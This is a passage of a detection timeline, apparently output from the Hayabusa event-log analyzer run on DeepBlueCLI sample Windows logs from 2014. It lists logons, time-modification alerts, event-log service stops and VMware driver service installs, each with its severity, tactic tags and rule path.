rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:49:55.313 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:50:49.109 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x2b7f0,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:51:44.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 06:52:36.312 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:52:38.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 06:52:41.000 +09:00,IE8WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 06:52:48.955 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: 
C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0xcf564,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf564 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 06:54:52.158 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0xcf598 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:23:56.575 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:26:20.278 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:35:01.091 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0xcf598,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:36:37.000 +09:00,IE8Win7,6006,info,,Event Log 
Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:38:20.765 +09:00,IE8Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:21.000 +09:00,IE8Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:38:22.000 +09:00,IE8Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 07:38:26.183 +09:00,IE8Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE8WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x27008,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27008 | (Warning: Credentials are stored in 
memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:38:48.104 +09:00,IE8Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE8WIN7 | IP Addr: 127.0.0.1 | LID: 0x27038 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:48:51.643 +09:00,IE8Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x27038,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:50:17.000 +09:00,IE8Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:51:16.890 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:19.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx 2014-11-26 07:51:22.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx 2014-11-26 07:51:29.601 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx 2014-11-26 07:51:34.460 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target 
User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x12048,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12048 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 07:51:34.460 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x12070 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 08:03:14.476 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x12070,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-26 08:03:47.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:54.687 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:34:56.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:34:59.000 +09:00,IE9WIN7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:35:04.667 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x131c3,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x131c3 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:09.745 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x13216 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:35:57.635 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IEUser | Target User: rdavis | IP Address: - | Process: | Target Server: HYPERV.sharplogic.local,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:41:21.932 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x13216,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:42:44.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:31.734 +09:00,IE9Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:43:34.000 +09:00,IE9Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 02:43:40.000 +09:00,IE9Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 02:43:56.893 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x36aed,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36aed | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE9WIN7 | IP Addr: 127.0.0.1 | LID: 0x36b1d | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:44:39.689 +09:00,IE9Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE9WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 02:59:00.431 +09:00,IE9Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:15:07.962 +09:00,IE9Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x36b1d,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:16:14.000 +09:00,IE9Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:04.250 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:05.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 03:17:08.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 03:17:13.369 +09:00,IE10Win7,4616,medium,Evas,Unauthorized System Time Modification,,../hayabusa-rules/sigma/builtin/security/win_susp_time_modification.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x11c02,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c02 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x11c32 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:17:19.150 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:30:25.009 +09:00,IE10Win7,4647,info,,Logoff - User Initiated,User: IEUser | LID: 0x11c32,../hayabusa-rules/hayabusa/default/events/Security/Logons/4647_LogoffUserInitiated.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 03:30:40.000 +09:00,IE10Win7,6006,info,,Event Log Service Stopped,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStopped.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:21:46.785 +09:00,IE10Win7,4624,info,,Logon Type 0 - System,Bootup,../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-0-System.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:47.000 +09:00,IE10Win7,6005,info,,Event Log Service Started,,../hayabusa-rules/hayabusa/default/events/System/6005_EventLogServiceStarted.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:21:48.000 +09:00,IE10Win7,4625,medium,InitAccess | Persis,Failed Logon From Public IP,,../hayabusa-rules/sigma/builtin/security/win_susp_failed_logon_source.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-application.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4672,info,,Admin Logon,User: IEUser | LID: 0x170f5,../hayabusa-rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x170f5 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4624,info,,Logon Type 2 - Interactive,User: IEUser | Computer: IE10WIN7 | IP Addr: 127.0.0.1 | LID: 0x17125 | (Warning: Credentials are stored in memory),../hayabusa-rules/hayabusa/default/events/Security/Logons/4624_LogonType-2-Interactive.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:21:50.498 +09:00,IE10Win7,4648,info,PrivEsc | LatMov,Explicit Logon,Source User: IE10WIN7$ | Target User: IEUser | IP Address: 127.0.0.1 | Process: C:\Windows\System32\winlogon.exe | Target Server: localhost,../hayabusa-rules/hayabusa/default/events/Security/Logons/4648_ExplicitLogon.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-security.evtx
2014-11-27 08:23:13.147 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP AutoConnect Service | Path: ""C:\Program Files\VMware\VMware Tools\TPAutoConnSvc.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:13.240 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: TP VC Gateway Service | Path: ""C:\Program Files\VMware\VMware Tools\TPVCGateway.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:19.075 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware VMCI Bus Driver | Path: system32\DRIVERS\vmci.sys | Account: | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:30.884 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Memory Module Driver | Path: system32\DRIVERS\pnpmem.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:31.757 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vSockets Driver | Path: C:\Windows\system32\drivers\vsock.sys | Account: | Start Type: boot start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:23:33.349 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Host Guest Client Redirector | Path: system32\drivers\vmhgfs.sys | Account: | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:11.865 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft 1.1 UAA Function Driver for High Definition Audio Service | Path: system32\drivers\HdAudio.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:17.909 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Clock Proxy | Path: system32\drivers\MSPCLOCK.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:18.237 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Quality Manager Proxy | Path: system32\drivers\MSPQM.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:19.969 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Service Proxy | Path: system32\drivers\MSKSSRV.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:20.281 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Streaming Tee/Sink-to-Sink Converter | Path: system32\drivers\MSTEE.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:20.452 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware USB Pointing Device | Path: system32\DRIVERS\vmusbmouse.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:23.245 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Microsoft Trusted Audio Drivers | Path: system32\drivers\drmkaud.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:30.249 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Radio USB Driver | Path: System32\Drivers\BTHUSB.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:31.310 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Port Driver | Path: System32\Drivers\BTHport.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:33.925 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Request Block Driver | Path: system32\DRIVERS\BthEnum.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:34.362 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (RFCOMM Protocol TDI) | Path: system32\DRIVERS\rfcomm.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:36.015 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Bluetooth Device (Personal Area Network) | Path: system32\DRIVERS\bthpan.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:38.153 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Pointing Device | Path: system32\DRIVERS\vmmouse.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:38.823 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: Memory Control Driver | Path: C:\Program Files\Common Files\VMware\Drivers\memctl\vmmemctl.sys | Account: | Start Type: auto start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:39.011 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Vista Physical Disk Helper | Path: C:\Program Files\VMware\VMware Tools\vmrawdsk.sys | Account: | Start Type: system start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:41.647 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: vm3dmp | Path: system32\DRIVERS\vm3dmp.sys | Account: | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:44.783 +09:00,IE10Win7,7045,info,Persis,Service Installed,"Name: VMware Tools | Path: ""C:\Program Files\VMware\VMware Tools\vmtoolsd.exe"" | Account: LocalSystem | Start Type: auto start",../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
2014-11-27 08:24:53.788 +09:00,IE10Win7,7045,info,Persis,Service Installed,Name: VMware Snapshot Provider | Path: C:\Windows\system32\dllhost.exe /Processid:{F3F72FE3-CF58-4A21-BBED-F596E5AFE5C0} | Account: NT AUTHORITY\LocalService | Start Type: demand start,../hayabusa-rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/DeepBlueCLI/many-events-system.evtx
